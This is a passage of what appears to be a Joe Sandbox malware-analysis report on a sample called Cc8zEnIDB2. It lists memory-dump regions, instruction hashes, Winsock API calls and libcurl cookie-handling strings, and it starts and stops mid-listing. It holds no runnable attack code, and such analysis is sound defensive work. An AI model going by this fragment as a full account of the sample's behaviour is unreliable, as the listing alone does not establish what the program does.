                                                      • Associated: 00000000.00000002.1395770755.0000000000AEA000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1395770755.0000000000C6B000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1395770755.0000000000D74000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1395770755.0000000000D78000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1395770755.0000000000E4F000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1395770755.0000000000E59000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1395770755.0000000000E67000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1396065369.0000000000E68000.00000080.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1396176817.0000000001018000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1396196650.000000000101A000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1396213416.000000000101B000.00000080.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_4d0000_Cc8zEnIDB2.jbxd
                                                      Similarity
                                                      • API ID: getsockname
                                                      • String ID:
                                                      • API String ID: 3358416759-0
                                                      • Opcode ID: 9d99b3799babc6df527b2cfcb0820408f07b128e0aecccab2105158f9ab54498
                                                      • Instruction ID: e93a59a0e00b77d70f376ec74bee269447c88aae99a51f129a4f127b8f75b3eb
                                                      • Opcode Fuzzy Hash: 9d99b3799babc6df527b2cfcb0820408f07b128e0aecccab2105158f9ab54498
                                                      • Instruction Fuzzy Hash: 9A11847080878596FB268F1CD4067E6B7F4FFD0329F109A18E59942550F7365AC58BD2
                                                      APIs
                                                      • send.WS2_32(?,?,?,00000000,00000000,?), ref: 0059A97E
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1395232706.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1395188158.00000000004D0000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1395232706.0000000000980000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1395232706.0000000000AE3000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1395232706.0000000000AE5000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1395751582.0000000000AE8000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1395770755.0000000000AEA000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1395770755.0000000000C6B000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1395770755.0000000000D74000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1395770755.0000000000D78000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1395770755.0000000000E4F000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1395770755.0000000000E59000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1395770755.0000000000E67000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1396065369.0000000000E68000.00000080.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1396176817.0000000001018000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1396196650.000000000101A000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1396213416.000000000101B000.00000080.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_4d0000_Cc8zEnIDB2.jbxd
                                                      Similarity
                                                      • API ID: send
                                                      • String ID:
                                                      • API String ID: 2809346765-0
                                                      • Opcode ID: c7e243cb15aa599b5c4232badd80d0efc9451f1d1ec9654fc1ecef4f194323bf
                                                      • Instruction ID: 0b245bb5c4546d80d5334e9489f7e7f901731384cffb1ea7a9b3cb3da3a604cd
                                                      • Opcode Fuzzy Hash: c7e243cb15aa599b5c4232badd80d0efc9451f1d1ec9654fc1ecef4f194323bf
                                                      • Instruction Fuzzy Hash: 5F0167717117109FC7148F19DC45B56BBA5FFC4720F068559E9941B361C331AC159BE1
                                                      APIs
                                                      • socket.WS2_32(?,0059B280,00000000,-00000001,00000000,0059B280,?,?,00000002,00000011,?,?,00000000,0000000B,?,?), ref: 0059AF66
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1395232706.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1395188158.00000000004D0000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1395232706.0000000000980000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1395232706.0000000000AE3000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1395232706.0000000000AE5000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1395751582.0000000000AE8000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1395770755.0000000000AEA000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1395770755.0000000000C6B000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1395770755.0000000000D74000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1395770755.0000000000D78000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1395770755.0000000000E4F000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1395770755.0000000000E59000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1395770755.0000000000E67000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1396065369.0000000000E68000.00000080.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1396176817.0000000001018000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1396196650.000000000101A000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1396213416.000000000101B000.00000080.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_4d0000_Cc8zEnIDB2.jbxd
                                                      Similarity
                                                      • API ID: socket
                                                      • String ID:
                                                      • API String ID: 98920635-0
                                                      • Opcode ID: b4f9f332b09a31cf691903b2f843f45a230052e47f7fe68930b0e61faddb67fd
                                                      • Instruction ID: 152a302cc8a4e2e4baadc8d202a21157b4a6458b64132558c192862b1ab31e86
                                                      • Opcode Fuzzy Hash: b4f9f332b09a31cf691903b2f843f45a230052e47f7fe68930b0e61faddb67fd
                                                      • Instruction Fuzzy Hash: 32E0EDB6A052256BDA649A58E8449ABF7A9EFC4B20F054A49BC5463204C330AC548BF2
                                                      APIs
                                                      • closesocket.WS2_32(?,00599422,?,?,?,?,?,?,?,?,?,?,?,w3X,00917680,00000000), ref: 0059B04D
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1395232706.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1395188158.00000000004D0000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1395232706.0000000000980000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1395232706.0000000000AE3000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1395232706.0000000000AE5000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1395751582.0000000000AE8000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1395770755.0000000000AEA000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1395770755.0000000000C6B000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1395770755.0000000000D74000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1395770755.0000000000D78000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1395770755.0000000000E4F000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1395770755.0000000000E59000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1395770755.0000000000E67000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1396065369.0000000000E68000.00000080.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1396176817.0000000001018000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1396196650.000000000101A000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1396213416.000000000101B000.00000080.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_4d0000_Cc8zEnIDB2.jbxd
                                                      Similarity
                                                      • API ID: closesocket
                                                      • String ID:
                                                      • API String ID: 2781271927-0
                                                      • Opcode ID: 1142219a967505983685fae860a6aa79eb5d1d013ea5e0742346121970fd7d11
                                                      • Instruction ID: c8123b219355202732e0bb1fae739d04581dcacff3e8d20dc942c6cbc55d814b
                                                      • Opcode Fuzzy Hash: 1142219a967505983685fae860a6aa79eb5d1d013ea5e0742346121970fd7d11
                                                      • Instruction Fuzzy Hash: 2AD0C23430020197EE208A14D988A577A2B7FC0310FA8DB68E02C4A150D73BCC438602
                                                      APIs
                                                      • ioctlsocket.WS2_32(?,8004667E,?,?,0050AF56,?,00000001), ref: 005367FB
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1395232706.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_4d0000_Cc8zEnIDB2.jbxd
                                                      Similarity
                                                      • API ID: ioctlsocket
                                                      • String ID:
                                                      • API String ID: 3577187118-0
                                                      • Opcode ID: 7f56edc930ffce1bb058c453448f5fb7ecff383716ef7ecfbaccf9112e5f6048
                                                      • Instruction ID: b7b02b9c8c308994bb11e45670cdb1ee1f24bb19364215e43a8300b6ed987101
                                                      • Opcode Fuzzy Hash: 7f56edc930ffce1bb058c453448f5fb7ecff383716ef7ecfbaccf9112e5f6048
                                                      • Instruction Fuzzy Hash: 9DC012F1109201EFC60C4724D855A6EB6D9DB85255F01592CB04692180EA349490CA16
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1395232706.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_4d0000_Cc8zEnIDB2.jbxd
                                                      Similarity
                                                      • API ID: CloseHandle
                                                      • String ID:
                                                      • API String ID: 2962429428-0
                                                      • Opcode ID: fa55ad865be5c581a62a0fcb77b23112e8a903fc29206a5d677751fc04c21877
                                                      • Instruction ID: 491f070d1d51c9339c110b9d4b37fbcc42ffd8772577c579396bb016f491364a
                                                      • Opcode Fuzzy Hash: fa55ad865be5c581a62a0fcb77b23112e8a903fc29206a5d677751fc04c21877
                                                      • Instruction Fuzzy Hash: 603190B49097089FCB10EFB8D59569EBBF0BF84344F00896AE898A7351E7749A44CF52
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1397915261.0000000007130000.00000040.00001000.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7130000_Cc8zEnIDB2.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: `
                                                      • API String ID: 0-934871106
                                                      • Opcode ID: 00be7b6da5783b8aa433670e53446fa5c5ad503927098a1bd83ed068c851e27e
                                                      • Instruction ID: 288664352921bc3a212875ce19bba18b350ff276cba5cfba904c494db038abe5
                                                      • Opcode Fuzzy Hash: 00be7b6da5783b8aa433670e53446fa5c5ad503927098a1bd83ed068c851e27e
                                                      • Instruction Fuzzy Hash: 381129F517C206EE971ACB54D9105FD7BFBEA8F230F3244E6E80A96249D3A04E094125
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1395232706.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_4d0000_Cc8zEnIDB2.jbxd
                                                      Similarity
                                                      • API ID: Sleep
                                                      • String ID:
                                                      • API String ID: 3472027048-0
                                                      • Opcode ID: 6c6455a390f56c6969cd356441ff708d0e3ba66e84c3f54c0e32d6071d0aa12c
                                                      • Instruction ID: b30f5a9967ff43f579c4fe3e361d0b4df4370a3ae52550ecf4517a2863b29b47
                                                      • Opcode Fuzzy Hash: 6c6455a390f56c6969cd356441ff708d0e3ba66e84c3f54c0e32d6071d0aa12c
                                                      • Instruction Fuzzy Hash: CBC04CE0C1464447D710BA38854651E79E47785504FC11E68D984961D5F72893588667
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398100630.00000000071D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 071D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_71d0000_Cc8zEnIDB2.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 69cd6bb0af58056383edc0e7b5f1ee0b09842649060c76d6a49935a566759150
                                                      • Instruction ID: d7659fd9cdf1a0ff2543f4db4d048095b29818aa721994fb5367cc4e461fe75c
                                                      • Opcode Fuzzy Hash: 69cd6bb0af58056383edc0e7b5f1ee0b09842649060c76d6a49935a566759150
                                                      • Instruction Fuzzy Hash: 43118CE712C20DEE9649562559514FB2F1AE79F330F32415EF043AA6C2D3250E290D32
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1397915261.0000000007130000.00000040.00001000.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7130000_Cc8zEnIDB2.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 19f94c7e6f65961fccfe1bba53dc7d5d61ac6c72452dfd9263eeb8b9f8b8f9d4
                                                      • Instruction ID: 33cc39007cc7d42ef80cd0038b3a6f339d61cd9fda0070f4171a8ed13d46ed3e
                                                      • Opcode Fuzzy Hash: 19f94c7e6f65961fccfe1bba53dc7d5d61ac6c72452dfd9263eeb8b9f8b8f9d4
                                                      • Instruction Fuzzy Hash: 1E01F5FA13C104EDA609C645A700AFE77EFE6DF330F3280A6F80A92644D3A14E495135
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398100630.00000000071D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 071D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_71d0000_Cc8zEnIDB2.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 847a04f901c2c67b6701ced344674c62d72b48ad35a31f63f37d568173344744
                                                      • Instruction ID: 2b270863058d205afed49b36c703dbe5d9cacbff191c4f664deeaf37c42f54e6
                                                      • Opcode Fuzzy Hash: 847a04f901c2c67b6701ced344674c62d72b48ad35a31f63f37d568173344744
                                                      • Instruction Fuzzy Hash: C9014CD702C20EEE9A0D5A2555515FA2B1AE79F734F33810AF043AA6C1D3264F1A0922
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1397915261.0000000007130000.00000040.00001000.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7130000_Cc8zEnIDB2.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 034d19effefbb63256374d55dce0a15415a8e16f6eaf74b6fe078ad9c5b7cce1
                                                      • Instruction ID: 2ce98115cd0589e43224aaabfc9a95f73b94757a779e9c05dbb2b450c7699dcf
                                                      • Opcode Fuzzy Hash: 034d19effefbb63256374d55dce0a15415a8e16f6eaf74b6fe078ad9c5b7cce1
                                                      • Instruction Fuzzy Hash: C701D4F613C205EDA609C644AB006FE77EEE78F330F3284A6E80A96684E3A15A495535
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1397915261.0000000007130000.00000040.00001000.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7130000_Cc8zEnIDB2.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 9a9022aa836d1c1385a7b32bd6dd393542af38fadfc0c94ae71a6b90bd18a1b4
                                                      • Instruction ID: 70171d33c518d169c81182eee09c6c4707cfc72fc7afaa8d8554e3da0deed585
                                                      • Opcode Fuzzy Hash: 9a9022aa836d1c1385a7b32bd6dd393542af38fadfc0c94ae71a6b90bd18a1b4
                                                      • Instruction Fuzzy Hash: 3E0124FA13C104EDA609C644E700AFD77EFE6CF330F3284A6E80A96644E3A14E494135
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398100630.00000000071D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 071D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_71d0000_Cc8zEnIDB2.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: fc5175e8699dfe9dc153db61f32f81081e4c61d1c78f8f7c82e453f03e8e42d8
                                                      • Instruction ID: d203ee22a4e0fd39f53376d8387ea67a5c8c3edbef838570055298fd17cbe6ca
                                                      • Opcode Fuzzy Hash: fc5175e8699dfe9dc153db61f32f81081e4c61d1c78f8f7c82e453f03e8e42d8
                                                      • Instruction Fuzzy Hash: ACF0F4EB17C00EED690D556666504FB1B0AF29F730F32850AF007B66C193254E150C36
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398100630.00000000071D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 071D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_71d0000_Cc8zEnIDB2.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 67147f66d6f31a6c8de2c7d9d580e34c890e44f68d759999bba9cdd407573005
                                                      • Instruction ID: 178b9f3df08cc358732ca7c234c95c456240c4ca9d79b268f6f616615a3a76c1
                                                      • Opcode Fuzzy Hash: 67147f66d6f31a6c8de2c7d9d580e34c890e44f68d759999bba9cdd407573005
                                                      • Instruction Fuzzy Hash: FFF028E713D20E9E9608692569505FB2B59E39F730F324615F043B75C493610E460D25
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1397915261.0000000007130000.00000040.00001000.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7130000_Cc8zEnIDB2.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f46f4870c70886498cb01c23405dae962b64a1a33661e9514c122d240e91ed81
                                                      • Instruction ID: 929ded66bb1ba81a849fad1e92d63c13c9e7c239d6cdf8b0d8837ec464d88b0b
                                                      • Opcode Fuzzy Hash: f46f4870c70886498cb01c23405dae962b64a1a33661e9514c122d240e91ed81
                                                      • Instruction Fuzzy Hash: 74F0D6F5138105ED9609CA5496006FD77FFE78F330F3280A6E80A92644E3B15E455535
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398100630.00000000071D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 071D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_71d0000_Cc8zEnIDB2.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f9b75da5f6aba0c667ffb6882be908dcfa07b34d1a257a0f68a90213f7b66e07
                                                      • Instruction ID: 0d932b4fd02af7444a5ee0ac43865cc4c622addc1b8cc0d24946aaf4fab2e1bb
                                                      • Opcode Fuzzy Hash: f9b75da5f6aba0c667ffb6882be908dcfa07b34d1a257a0f68a90213f7b66e07
                                                      • Instruction Fuzzy Hash: 2C0149E712D2899FD70A5B3514911F53F65EB5F234F36058AE082AF6C3C7294E0A4B32
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1397915261.0000000007130000.00000040.00001000.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7130000_Cc8zEnIDB2.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: caca29bc3fe5a87e3b0b863b20f67fac84be7eb894b5ca8622f476d643a8b871
                                                      • Instruction ID: a5d6a1710dcc4ef9bc5e36774ced972ce50dd910f2dea1bf8679732931840d63
                                                      • Opcode Fuzzy Hash: caca29bc3fe5a87e3b0b863b20f67fac84be7eb894b5ca8622f476d643a8b871
                                                      • Instruction Fuzzy Hash: 74F07DF603C104EDC70AC76892542FCBBF6EA8F330F3644D6E80E55645D3A54A0A5135
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398100630.00000000071D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 071D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_71d0000_Cc8zEnIDB2.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4345d412fb5e54cd4d92f37340c163cda7915745b586ff540589df9b031c1dc0
                                                      • Instruction ID: d8022f416a6c74c5dd2f6652cfd2169710de63c244040e59402ca8d777dac6af
                                                      • Opcode Fuzzy Hash: 4345d412fb5e54cd4d92f37340c163cda7915745b586ff540589df9b031c1dc0
                                                      • Instruction Fuzzy Hash: 51F08BE703D20EDE960C9925A5900FA2B55E39F330F324509F043B66C5D3210F454D31
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398100630.00000000071D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 071D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_71d0000_Cc8zEnIDB2.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6d9989c751190e3e135b3688f02c02b62a9d6fe29e59ab5ccda18fe7b232f087
                                                      • Instruction ID: 197a34992616fd1a8d7762175e037715314f164d1a7ca15069233021ce9b2544
                                                      • Opcode Fuzzy Hash: 6d9989c751190e3e135b3688f02c02b62a9d6fe29e59ab5ccda18fe7b232f087
                                                      • Instruction Fuzzy Hash: 90F0E9E717D10EDE550C652666615FB1705E29F730F33851AF007B66C597254F090D36
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1397915261.0000000007130000.00000040.00001000.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7130000_Cc8zEnIDB2.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: fd3d416e2aac6c6da2a3844bf41f02e77f7a4b07844838abb321b4bbfcb0620f
                                                      • Instruction ID: 2636a79c0276a850aef457ea24745990c53bc1446e79b544571032318c52e3dd
                                                      • Opcode Fuzzy Hash: fd3d416e2aac6c6da2a3844bf41f02e77f7a4b07844838abb321b4bbfcb0620f
                                                      • Instruction Fuzzy Hash: ADF081F5078104DDD619C76496502FC77FAE79F230F3244E7E40AA2A84E3608F095525
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1397915261.0000000007130000.00000040.00001000.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7130000_Cc8zEnIDB2.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: bcb7a745c366c887e74a7022d0fd7582e213c9e96e4c5dd2559086fd04dfba94
                                                      • Instruction ID: 60f75687384e7b8e9272a9c1c09f53b1012b30f67027d04a512e317639507068
                                                      • Opcode Fuzzy Hash: bcb7a745c366c887e74a7022d0fd7582e213c9e96e4c5dd2559086fd04dfba94
                                                      • Instruction Fuzzy Hash: 55F021F5138104DDD709C75492445FC77FAA68F330F3644B6E40A62645D3A05E095525
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398100630.00000000071D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 071D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_71d0000_Cc8zEnIDB2.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 3a68f2898efcedc38c4a9c7e9581e1cb4eb5adc06c8b7729dd13668ba1b6ec17
                                                      • Instruction ID: b6aa83986ae569e973215527a363950206728b9292ef72ec256c922fe60880de
                                                      • Opcode Fuzzy Hash: 3a68f2898efcedc38c4a9c7e9581e1cb4eb5adc06c8b7729dd13668ba1b6ec17
                                                      • Instruction Fuzzy Hash: 59F055E746C30ADF92589A6201800FB3399F76F330F328419F003A76C0A7241E050D36
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1395232706.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                       • Associated: 00000000.00000002.1395188158.00000000004D0000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1395232706.0000000000980000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1395232706.0000000000AE3000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1395232706.0000000000AE5000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1395751582.0000000000AE8000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1395770755.0000000000AEA000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1395770755.0000000000C6B000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1395770755.0000000000D74000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1395770755.0000000000D78000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1395770755.0000000000E4F000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1395770755.0000000000E59000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1395770755.0000000000E67000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1396065369.0000000000E68000.00000080.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1396176817.0000000001018000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1396196650.000000000101A000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1396213416.000000000101B000.00000080.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_4d0000_Cc8zEnIDB2.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: #HttpOnly_$%s cookie %s="%s" for domain %s, path %s, expire %lld$;=$;$=$Added$FALSE$Replaced$TRUE$__Host-$__Secure-$cookie '%s' dropped, domain '%s' must not set cookies for '%s'$cookie '%s' for domain '%s' dropped, would overlay an existing cookie$cookie contains TAB, dropping$cookie.c$domain$expires$httponly$invalid octets in name/value, cookie dropped$libpsl problem, rejecting cookie for satety$max-age$oversized cookie dropped, name/val %zu + %zu bytes$path$secure$skipped cookie with bad tailmatch domain: %s$version
                                                      • API String ID: 0-1371176463
                                                      • Opcode ID: c3257d62638e98a859222f9cf0c3ae2327789006eb1dafafad666c193c6e9429
                                                      • Instruction ID: 397c137762919aff3e2f3030f215b9f2139ee75fd15c95c016d8e3a99aab5fb8
                                                      • Opcode Fuzzy Hash: c3257d62638e98a859222f9cf0c3ae2327789006eb1dafafad666c193c6e9429
                                                      • Instruction Fuzzy Hash: BFB25870A087006BFB219A25DC52BA77FD5BF80308F08492DF98997292F775ECA1C756
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1395232706.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                       • Associated: 00000000.00000002.1395188158.00000000004D0000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1395232706.0000000000980000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1395232706.0000000000AE3000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1395232706.0000000000AE5000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1395751582.0000000000AE8000.00000004.00000001.01000000.00000003.sdmp
